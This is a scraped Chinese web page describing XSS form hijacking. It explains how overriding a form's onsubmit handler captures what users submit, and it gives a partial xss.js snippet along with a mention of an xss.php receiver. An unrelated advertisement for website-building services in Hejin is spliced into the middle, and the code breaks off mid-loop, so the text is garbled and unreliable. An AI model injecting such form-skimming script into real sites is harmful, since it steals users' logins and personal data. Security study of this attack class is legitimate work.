xss表单劫持(from通用明文记录)
大家都知道,在提交form表单时会调用onsubmit方法,既然调用了onsubmit,说明表单中该填的项肯定都已经填好了,这时,我们通过修改onsubmit方法,便可以获取表单中的信息.
为河津等地区用户提供了全套网页设计制作服务,及河津网站建设行业解决方案。主营业务为网站设计、网站建设、河津网站设计,以传统方式定制建设网站,并提供域名空间备案等一条龙服务,秉承以专业、用心的态度为用户提供真诚的服务。我们深信只要达到每一位用户的要求,就会得到认可,从而选择与我们长期合作。这样,我们也可以走得更远!
xss.js:
var f=document.forms['from1']; if(f==undefined) { f=document.getElementById(''); } var func=f.onsubmit; f.onsubmit=function(event) { var str=''; for(var i=0;i根据各程序不同,修改表单名称
var f=document.forms['form1'];接收端xss.php
参考:
http://dwblog.github.io/2015/04/29/%E8%A1%A8%E5%8D%95%E5%8A%AB%E6%8C%81/
文章题目:xss表单劫持(from通用明文记录)
网站URL:http://hbruida.cn/article/pshoeo.html